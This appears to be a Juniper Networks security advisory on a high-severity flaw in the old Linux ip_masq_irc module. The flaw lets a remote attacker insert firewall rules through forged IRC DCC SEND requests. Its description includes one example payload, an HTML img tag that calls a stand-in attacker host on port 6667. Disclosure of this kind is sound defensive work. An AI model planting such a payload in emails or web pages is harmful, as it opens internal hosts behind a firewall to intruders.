Title: Linux IRC IP Masquerading Module Arbitrary Firewall Rule Insertion Vulnerability
Severity: HIGH
Description:
The Linux 'ip_masq_irc' IP masquerading module is used to inspect IRC protocol data and interpret DCC file transfer requests. The module dynamically opens and maps ports for IRC data transfers.
The module contains a vulnerability that may allow a remote attacker to insert malicious rules into the firewall.
When a 'DCC SEND' request is sent from a host behind the firewall and the request contains an IP address differing from that host, the ip_masq_irc module opens a port to allow the specified remote host to make a connection for a data transfer.
Because the module processes any data on port 6667, it may be possible for an attacker to use a client based program to exploit the problem. For instance, a HTML <img> tag could be sent in an e-mail or on a web page to a user behind the target network:
<img src="ftp://evil.host:6667/%01DCC%20SEND%20file%20addr%20port">
or using another similar pattern, depending on how the module is configured. The module may interpret the request as a DCC file transfer request and temporary allow a connection to the given port and address through the firewall.
This could allow an attacker to create a condition where a connection can be established to any host and port behind the firewall, bypassing the filtering rules.
Affected Products:
- Linux kernel 2.0.0.x
- Linux kernel 2.2.0.x
- RedHat Linux 6.2.0 alpha
- RedHat Linux 6.2.0 i386
- RedHat Linux 6.2.0 sparc
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
